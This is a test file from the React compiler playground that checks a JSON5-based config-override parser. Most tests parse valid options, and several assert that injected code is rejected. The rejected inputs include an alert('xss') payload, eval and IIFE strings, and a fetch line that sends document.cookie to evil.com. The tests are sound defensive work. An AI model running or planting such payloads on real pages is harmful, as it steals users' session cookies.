react/compiler/apps/playground/__tests__/parseConfigOverrides.test.mjs at 91452c1b4b44bb5cf53d5e5ea4754e6c81946bae · facebook/react · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
/**
 * Copyright (c) Meta Platforms, Inc. and affiliates.
 *
 * This source code is licensed under the MIT license found in the
 * LICENSE file in the root directory of this source tree.
 */

import assert from 'node:assert';
import {test, describe} from 'node:test';
import JSON5 from 'json5';

// Re-implement parseConfigOverrides here since the source uses TS imports
// that can't be directly loaded by Node. This mirrors the logic in
// compilation.ts exactly.
function parseConfigOverrides(configOverrides) {
  const trimmed = configOverrides.trim();
  if (!trimmed) {
    return {};
  }
  return JSON5.parse(trimmed);
}

describe('parseConfigOverrides', () => {
  test('empty string returns empty object', () => {
    assert.deepStrictEqual(parseConfigOverrides(''), {});
    assert.deepStrictEqual(parseConfigOverrides('   '), {});
  });

  test('default config parses correctly', () => {
    const config = `{
  //compilationMode: "all"
}`;
    const result = parseConfigOverrides(config);
    assert.deepStrictEqual(result, {});
  });

  test('compilationMode "all" parses correctly', () => {
    const config = `{
  compilationMode: "all"
}`;
    const result = parseConfigOverrides(config);
    assert.deepStrictEqual(result, {compilationMode: 'all'});
  });

  test('config with single-line and block comments parses correctly', () => {
    const config = `{
  // This is a single-line comment
  /* This is a block comment */
  compilationMode: "all",
}`;
    const result = parseConfigOverrides(config);
    assert.deepStrictEqual(result, {compilationMode: 'all'});
  });

  test('config with trailing commas parses correctly', () => {
    const config = `{
  compilationMode: "all",
}`;
    const result = parseConfigOverrides(config);
    assert.deepStrictEqual(result, {compilationMode: 'all'});
  });

  test('nested environment options parse correctly', () => {
    const config = `{
  environment: {
    validateRefAccessDuringRender: true,
  },
}`;
    const result = parseConfigOverrides(config);
    assert.deepStrictEqual(result, {
      environment: {validateRefAccessDuringRender: true},
    });
  });

  test('multiple options parse correctly', () => {
    const config = `{
  compilationMode: "all",
  environment: {
    validateRefAccessDuringRender: false,
  },
}`;
    const result = parseConfigOverrides(config);
    assert.deepStrictEqual(result, {
      compilationMode: 'all',
      environment: {validateRefAccessDuringRender: false},
    });
  });

  test('rejects malicious IIFE injection', () => {
    const config = `(function(){ document.title = "hacked"; return {}; })()`;
    assert.throws(() => parseConfigOverrides(config));
  });

  test('rejects malicious comma operator injection', () => {
    const config = `{
  compilationMode: (alert("xss"), "all")
}`;
    assert.throws(() => parseConfigOverrides(config));
  });

  test('rejects function call in value', () => {
    const config = `{
  compilationMode: eval("all")
}`;
    assert.throws(() => parseConfigOverrides(config));
  });

  test('rejects variable references', () => {
    const config = `{
  compilationMode: someVar
}`;
    assert.throws(() => parseConfigOverrides(config));
  });

  test('rejects template literals', () => {
    const config = `{
  compilationMode: \`all\`
}`;
    assert.throws(() => parseConfigOverrides(config));
  });

  test('rejects constructor calls', () => {
    const config = `{
  compilationMode: new String("all")
}`;
    assert.throws(() => parseConfigOverrides(config));
  });

  test('rejects arbitrary JS code', () => {
    const config = `fetch("https://evil.com?c=" + document.cookie)`;
    assert.throws(() => parseConfigOverrides(config));
  });

  test('config with array values parses correctly', () => {
    const config = `{
  sources: ["src/a.ts", "src/b.ts"],
}`;
    const result = parseConfigOverrides(config);
    assert.deepStrictEqual(result, {sources: ['src/a.ts', 'src/b.ts']});
  });

  test('config with null values parses correctly', () => {
    const config = `{
  compilationMode: null,
}`;
    const result = parseConfigOverrides(config);
    assert.deepStrictEqual(result, {compilationMode: null});
  });

  test('config with numeric values parses correctly', () => {
    const config = `{
  maxLevel: 42,
}`;
    const result = parseConfigOverrides(config);
    assert.deepStrictEqual(result, {maxLevel: 42});
  });
});